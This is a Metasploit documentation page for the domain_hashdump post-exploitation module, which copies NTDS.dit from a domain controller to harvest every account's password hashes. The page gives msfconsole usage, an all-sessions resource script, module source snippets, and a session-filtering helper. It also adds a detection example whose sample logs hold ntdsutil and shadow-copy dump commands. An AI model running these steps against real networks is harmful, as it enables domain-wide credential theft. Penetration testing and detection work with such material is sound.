Windows Domain Controller Hashdump - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/domain_hashdump Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Domain Controller Hashdump
Module: post/windows/gather/credentials/domain_hashdump
Source code: modules/post/windows/gather/credentials/domain_hashdump.rb
Disclosure date: -
Last modification time: 2022-09-23 17:41:20 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module attempts to copy the NTDS.dit database from a live Domain Controller and then parse out all of the User Accounts. It saves all of the captured password hashes, including historical ones.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/domain_hashdump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/domain_hashdump
msf post(domain_hashdump) > show options
... show and set options ...
msf post(domain_hashdump) > set SESSION session-id
msf post(domain_hashdump) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script. The loop is Ruby, so it must sit between <ruby> and </ruby> tags for msfconsole to evaluate it rather than treat each line as a console command:
<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/domain_hashdump")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
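The all-sessions loop above will happily run the module against sessions that can never satisfy its preconditions (a plain shell, a Linux host, or a 32-bit Meterpreter that the module rejects with "You are running 32-bit Meterpreter on a 64 bit system"). The following is an added example, not code from this page or from the Metasploit project, that filters the session list first and explains each skip. It assumes a session object exposes sid, type, platform, arch and info the way Metasploit sessions do; outside msfconsole it runs against the constructed SAMPLE_SESSIONS list and prints the commands it would issue, while inside an .rc <ruby> block it uses framework.sessions and run_single.

```ruby
# Added example, not part of the page or the domain_hashdump module.
# Filters sessions down to those that can pass the module's own checks
# (Meterpreter on Windows; x86 Meterpreter on x64 is rejected by
# session_compat?) before looping, and reports why each other session
# is skipped. Admin rights and domain-controller membership are only
# knowable on the host, so they are left to the module's preconditions_met?.

HASHDUMP_MODULE = 'post/windows/gather/credentials/domain_hashdump'

# Minimal stand-in for a Metasploit session (assumed attribute names).
SessionLike = Struct.new(:sid, :type, :platform, :arch, :info)

# Constructed sample inventory: only session 1 qualifies.
SAMPLE_SESSIONS = [
  SessionLike.new(1, 'meterpreter', 'windows', 'x64', 'NT AUTHORITY\\SYSTEM @ DC01'),
  SessionLike.new(2, 'meterpreter', 'windows', 'x86', 'CORP\\helpdesk @ WS07'),
  SessionLike.new(3, 'shell',       'windows', 'x64', 'CORP\\svc @ FS02'),
  SessionLike.new(4, 'meterpreter', 'linux',   'x64', 'root @ web01'),
]

# nil when the session is a candidate, otherwise the reason to skip it.
def skip_reason(s)
  return 'not a Meterpreter session' unless s.type == 'meterpreter'
  return 'not a Windows session' unless s.platform.to_s.downcase.start_with?('windows')
  return 'x86 Meterpreter: migrate to a 64-bit process first' unless s.arch == 'x64'
  nil
end

def eligible_sessions(sessions)
  sessions.select { |s| skip_reason(s).nil? }
end

# The msfconsole commands the resource script issues for one session.
def commands_for(s)
  ["use #{HASHDUMP_MODULE}", "set SESSION #{s.sid}", 'run']
end

# Inside an .rc <ruby> block `framework` and `run_single` exist; stand-alone they do not.
sessions = defined?(framework) ? framework.sessions.values : SAMPLE_SESSIONS
sessions.each do |s|
  why = skip_reason(s)
  if why
    puts "[-] skipping session #{s.sid} (#{s.info}): #{why}"
    next
  end
  commands_for(s).each do |cmd|
    defined?(run_single) ? run_single(cmd) : puts("msf> #{cmd}")
  end
end
```

Wrap the block in <ruby> and </ruby> inside an .rc file and load it with the resource command. Note that the filter is stricter than the module: it skips every x86 Meterpreter because the host architecture is not visible from the framework side without running sysinfo, whereas the module only rejects x86 Meterpreter on an x64 host.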
Required Options
- SESSION: The session to run this module on.
Msfconsole Usage
Here is how the windows/gather/credentials/domain_hashdump post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/domain_hashdump
msf6 post(windows/gather/credentials/domain_hashdump) > show info
Name: Windows Domain Controller Hashdump
Module: post/windows/gather/credentials/domain_hashdump
Platform: Windows
Arch:
Rank: Normal
Provided by:
theLightCosine
Compatible session types:
Meterpreter
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
CLEANUP  true             yes       Automatically delete ntds backup created
RHOST    localhost        yes       Target address range
SESSION                   yes       The session to run this module on.
TIMEOUT  60               yes       Timeout for WMI command in seconds
Description:
This module attempts to copy the NTDS.dit database from a live
Domain Controller and then parse out all of the User Accounts. It
saves all of the captured password hashes, including historical
ones.
Module Options
This is a complete list of options available in the windows/gather/credentials/domain_hashdump post exploitation module:
msf6 post(windows/gather/credentials/domain_hashdump) > show options
Module options (post/windows/gather/credentials/domain_hashdump):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
CLEANUP  true             yes       Automatically delete ntds backup created
RHOST    localhost        yes       Target address range
SESSION                   yes       The session to run this module on.
TIMEOUT  60               yes       Timeout for WMI command in seconds
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/domain_hashdump post exploitation module:
msf6 post(windows/gather/credentials/domain_hashdump) > show advanced
Module advanced options (post/windows/gather/credentials/domain_hashdump):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/domain_hashdump module can do:
msf6 post(windows/gather/credentials/domain_hashdump) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/domain_hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/domain_hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Failed to properly parse database: <E>
- Error 1004 is likely a jet database error because the ntds database is not in the regular format
- <NTDS_FILE> requires manual cleanup
- This version of Windows is unsupported
- There was an error copying the ntds.dit file!
- This module requires Admin privs to run
- This does not appear to be an AD Domain Controller
- You are running 32-bit Meterpreter on a 64 bit system
- Try migrating to a 64-bit process and try again
- Unable to start VSS service
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to properly parse database: <E>
Here is a relevant code snippet related to the "Failed to properly parse database: <E>" error message:
    print_status repair_ntds(ntds_file)
    realm = sysinfo["Domain"]
    begin
      ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_bad("Failed to properly parse database: #{e}")
      if e.to_s.include? "1004"
        print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
      end
    end
    unless ntds_parser.nil?
Error 1004 is likely a jet database error because the ntds database is not in the regular format
Here is a relevant code snippet related to the "Error 1004 is likely a jet database error because the ntds database is not in the regular format" error message:
    begin
      ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_bad("Failed to properly parse database: #{e}")
      if e.to_s.include? "1004"
        print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
      end
    end
    unless ntds_parser.nil?
      print_status "Started up NTDS channel. Preparing to stream results..."
      ntds_parser.each_account do |ad_account|
<NTDS_FILE> requires manual cleanup
Here is a relevant code snippet related to the "<NTDS_FILE> requires manual cleanup" error message:
      end
      if datastore['cleanup']
        print_status "Deleting backup of NTDS.dit at #{ntds_file}"
        rm_f(ntds_file)
      else
        print_bad "#{ntds_file} requires manual cleanup"
      end
    end
  end
end

This version of Windows is unsupported
Here is a relevant code snippet related to the "This version of Windows is unsupported" error message:
      database_file_path = vss_method
    when /2008|2012|2016/
      print_status "Using NTDSUTIL method"
      database_file_path = ntdsutil_method
    else
      print_error "This version of Windows is unsupported"
    end
    database_file_path
  end

  def domain_controller?
There was an error copying the ntds.dit file!
Here is a relevant code snippet related to the "There was an error copying the ntds.dit file!" error message:
    result = cmd_exec("ntdsutil.exe", command_arguments, 90)
    if result.include? "IFM media created successfully"
      file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
      print_status "NTDS database copied to #{file_path}"
    else
      print_error "There was an error copying the ntds.dit file!"
      vprint_error result
      file_path = nil
    end
    file_path
  end
This module requires Admin privs to run
Here is a relevant code snippet related to the "This module requires Admin privs to run" error message:

  def preconditions_met?
    if is_admin?
      print_status "Session has Admin privs"
    else
      print_error "This module requires Admin privs to run"
      return false
    end
    if domain_controller?
      print_status "Session is on a Domain Controller"
    else
This does not appear to be an AD Domain Controller
Here is a relevant code snippet related to the "This does not appear to be an AD Domain Controller" error message:
      return false
    end
    if domain_controller?
      print_status "Session is on a Domain Controller"
    else
      print_error "This does not appear to be an AD Domain Controller"
      return false
    end
    unless session_compat?
      return false
    end
You are running 32-bit Meterpreter on a 64 bit system
Here is a relevant code snippet related to the "You are running 32-bit Meterpreter on a 64 bit system" error message:
    create_credential(cred_details)
  end

  def session_compat?
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      print_error "You are running 32-bit Meterpreter on a 64 bit system"
      print_error "Try migrating to a 64-bit process and try again"
      false
    else
      true
    end
Try migrating to a 64-bit process and try again
Here is a relevant code snippet related to the "Try migrating to a 64-bit process and try again" error message:
  end

  def session_compat?
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      print_error "You are running 32-bit Meterpreter on a 64 bit system"
      print_error "Try migrating to a 64-bit process and try again"
      false
    else
      true
    end
  end
Unable to start VSS service
Here is a relevant code snippet related to the "Unable to start VSS service" error message:
    end
  end

  def vss_method
    unless start_vss
      fail_with(Failure::NoAccess, "Unable to start VSS service")
    end
    location = ntds_location.dup
    volume = location.slice!(0, 3)
    # double quotes are required here: Ruby does not interpolate #{...} inside single quotes
    id = create_shadowcopy("#{volume}")
    print_status "Getting Details of ShadowCopy #{id}"
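The two snippets above also describe what a defender sees on the domain controller: either an ntdsutil.exe IFM export (ntdsutil_method, whose success string is "IFM media created successfully") or a volume shadow copy created through WMI and then read for ntds.dit (vss_method, hence the "Timeout for WMI command" option). The following is an added detection example, not code from this page or from the Metasploit project, that matches both paths over process-creation events and correlates the shadow-copy path so that routine backup snapshots alone do not alert. The one-line event layout (time|host|user|image|commandline) is this example's own, the sample events are constructed, and the exact ntdsutil arguments and the wmic invocation in them are assumptions, since the page does not show the command lines the module runs.

```ruby
# Added example, not part of the page or the domain_hashdump module:
# detect NTDS.dit collection via ntdsutil IFM export or via a shadow copy
# over constructed process-creation events (Sysmon ID 1 / Security 4688
# style, flattened to one line: time|host|user|image|commandline).
require 'time'

Event = Struct.new(:time, :host, :user, :image, :cmdline)

# Constructed sample log. The ntdsutil arguments and the wmic shadow-copy call
# are illustrative (assumed), not the module's literal command lines.
SAMPLE_EVENTS = <<~'LOG'
  2024-03-01T10:01:02Z|DC01|CORP\svc_backup|C:\Windows\System32\ntdsutil.exe|ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\ifm" q q
  2024-03-01T10:05:11Z|DC01|NT AUTHORITY\SYSTEM|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy call create Volume='C:\'
  2024-03-01T10:05:40Z|DC01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
  2024-03-01T11:00:00Z|WS07|CORP\alice|C:\Windows\System32\notepad.exe|notepad.exe report.txt
  2024-03-02T02:00:00Z|DC01|CORP\svc_backup|C:\Windows\System32\ntdsutil.exe|ntdsutil.exe "ac i ntds" "files" "info" q q
  2024-03-01T23:00:00Z|DC02|NT AUTHORITY\SYSTEM|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy call create Volume='C:\'
LOG

# Each rule is a predicate over one event.
RULES = {
  'ntdsutil IFM export'            => ->(e) { e.image =~ /\\ntdsutil\.exe\z/i && e.cmdline =~ /\bifm\b/i && e.cmdline =~ /\bcreate\b/i },
  'shadow copy created via WMI'    => ->(e) { e.cmdline =~ /shadowcopy\s+call\s+create/i },
  'ntds.dit read from shadow copy' => ->(e) { e.cmdline =~ /HarddiskVolumeShadowCopy\d+.*\bntds\.dit\b/i },
}

def parse_events(text)
  text.each_line.map do |line|
    t, host, user, image, cmd = line.chomp.split('|', 5)
    Event.new(Time.iso8601(t), host, user, image, cmd)
  end
end

# One match record per (event, rule) pair that fires.
def match_rules(events)
  events.flat_map do |e|
    RULES.select { |_, test| test.call(e) }.keys.map do |rule|
      { rule: rule, host: e.host, user: e.user, time: e.time }
    end
  end
end

# An IFM export on a DC is conclusive on its own. For the VSS path, require the
# shadow copy creation and the ntds.dit read on the same host within `window`
# seconds, because backup software creates shadow copies legitimately.
def hosts_dumping_ntds(matches, window: 900)
  matches.group_by { |m| m[:host] }.select do |_, ms|
    next true if ms.any? { |m| m[:rule] == 'ntdsutil IFM export' }
    creates = ms.select { |m| m[:rule] == 'shadow copy created via WMI' }
    reads   = ms.select { |m| m[:rule] == 'ntds.dit read from shadow copy' }
    creates.any? { |c| reads.any? { |r| (r[:time] - c[:time]).between?(0, window) } }
  end.keys
end

if __FILE__ == $PROGRAM_NAME
  hosts_dumping_ntds(match_rules(parse_events(SAMPLE_EVENTS))).each do |h|
    puts "[!] NTDS.dit collection observed on #{h}"
  end
end
```

With the sample above only DC01 is reported: it shows both the IFM export and the shadow-copy-then-copy sequence, while DC02's lone shadow copy and the "files info" ntdsutil run are left alone. Real deployments should also watch the WMI and VSS service event logs, since the module's vss_method starts the VSS service before creating the snapshot.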
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #9211 Merged Pull Request: Updated domain_hashdump fix
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8516 Merged Pull Request: add some attempts at debugging to ntds
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5657 Merged Pull Request: Feature/msp 12867/domain hashdump rfe
- #5348 Merged Pull Request: Feature/msp 12358/ntds dump module
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- theLightCosine
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.